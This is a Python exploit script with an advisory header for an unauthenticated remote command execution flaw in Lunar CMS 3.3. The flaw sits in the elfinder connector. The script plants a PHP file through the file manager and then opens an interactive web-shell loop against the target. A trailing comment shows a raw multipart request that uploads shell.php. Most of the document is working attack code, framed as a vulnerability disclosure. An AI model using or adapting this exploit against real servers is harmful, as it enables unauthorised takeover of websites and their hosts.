#!/usr/bin/env python # # # Lunar CMS 3.3 Unauthenticated Remote Command Execution Exploit # # # Vendor: Lunar CMS # Product web page: http://www.lunarcms.com # Affected version: 3.3 # # Summary: Lunar CMS is a freely distributable open source content # management system written for use on servers running the ever so # popular PHP5 & MySQL. # # Desc: Lunar CMS suffers from an unauthenticated arbitrary command # execution vulnerability. The issue is caused due to the improper # verification of elfinder's upload/create/rename function in the file # manager. This can be exploited to execute arbitrary PHP code by creating # or uploading a malicious PHP script file that will be stored in '/files' # directory. # # Tested on: Apache/2.4.7 (Win32) # PHP/5.5.6 # MySQL 5.6.14 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2014-5189 # Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2014-5189.php # # Vendor fix: http://lunarcms.com/Get.html # # # 11.06.2014 # import cookielib, urllib import urllib2, sys, os piton = os.path.basename(sys.argv[0]) if len(sys.argv) < 4: print '\n\x20\x20[*] Usage: '+piton+' \n' print '\x20\x20[*] Example: '+piton+' zeroscience.mk lunarcms backdoor.php\n' sys.exit() host = sys.argv[1] path = sys.argv[2] fname = sys.argv[3] cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) create = opener.open('http://'+host+'/'+path+'/admin/includes/elfinder/php/connector.php?cmd=mkfile&name='+fname+'&target=l1_XA') #print create.read() payload = urllib.urlencode({ 'cmd' : 'put', 'target' : 'l1_'+fname.encode('base64','strict'), 'content' : '' }) write = opener.open('http://'+host+'/'+path+'/admin/includes/elfinder/php/connector.php', payload) #print write.read() print '\n' while True: try: cmd = raw_input('shell@'+host+':~# ') execute = opener.open('http://'+host+'/'+path+'/files/'+fname+'?cmd='+urllib.quote(cmd)) reverse = execute.read() print reverse; if cmd.strip() == 'exit': break except Exception: break sys.exit() # # Using the upload vector: # # POST /lc/admin/includes/elfinder/php/connector.php HTTP/1.1 # Host: localhost # User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 # Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 # Accept-Language: en-US,en;q=0.5 # Accept-Encoding: gzip, deflate # Referer: http://localhost/lc/admin/file_manager.php # Content-Length: 443 # Content-Type: multipart/form-data; boundary=---------------------------156802976525302 # Cookie: PHPSESSID=n37tnhsdfs1sgolum477jgqg33 # Connection: keep-alive # Pragma: no-cache # Cache-Control: no-cache # # -----------------------------156802976525302 # Content-Disposition: form-data; name="cmd" # # upload # -----------------------------156802976525302 # Content-Disposition: form-data; name="target" # # l1_XA # -----------------------------156802976525302 # Content-Disposition: form-data; name="upload[]"; filename="shell.php" # Content-Type: application/octet-stream # # # -----------------------------156802976525302-- # #